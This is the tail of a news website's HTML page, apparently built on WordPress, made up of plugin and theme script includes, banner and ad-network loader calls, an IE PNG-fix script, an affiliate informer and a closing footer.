</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress_js.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/comment-reply.min.js'></script><script type="text/javascript"> var swp_nonce = "e1863096dd";var swpFloatBeforeContent = false;var swpClickTracking = false;</script><script>//new adriver("adriver_banner_A1", {sid:101080,sz:"A1", bt:52,pz:1,bn:0});
new adriver("adriver_banner_B4", {sid:101080,sz:"B4", bt:52,pz:2,bn:1});new adriver("adriver_banner_C1", {sid: 101080, sz: "C1", pz: 1, bn: 1, bt:52});//new adriver("adriver_banner_C2", {sid: 101080, sz: "C2", pz: 2, bn: 2, bt:52});
new adriver("adriver_banner_C3", {sid: 101080, sz: "C3", pz: 2, bn: 3, bt:52});new adriver("adriver_banner_branding", {sid: 101080, sz: "branding", bt:52});//new adriver("adriver_banner_1964215071", {sid:101080, bt:52, sz:'contentroll'});
</script><script>document.getElementById('logo').style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";//img.style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";
</script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/iepngfix.min.js" ></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/png_fix.js" ></script><script>//var pollsL10n = document.getElementById('pollsL10n');
</script><!-- <script type="text/javascript" language="javascript" charset="UTF-8" src="http://js.ru.redtram.com/n4p/e/i/eizvestia.com_20895.js" async></script> --><!--<script type="text/javascript">admixerML.fn.push(function () {admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f',ph: 'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069',i: 'inv-nets'
});admixerML.singleRequest();});</script>--><div id='admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069'></div><script>admixerML.fn.push(function () { admixerML.display('admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069'); });</script><script>jQuery(document).ready(function($){setTimeout(function() { ah2 = $("body .container").height(); $("#brandingimg").css('height', ah2 + 'px'); }, 2500);});</script><script src="https://affiliate.ria.com/js/ria_informer.js?riacode=015d2e7c4ce2cda608aa710275088255" async></script><div id="bfooter" style="width:1004px;margin:0 auto;position: relative;padding: 0 10px;display: block;text-align:left;">&nbsp;</div> </body></html>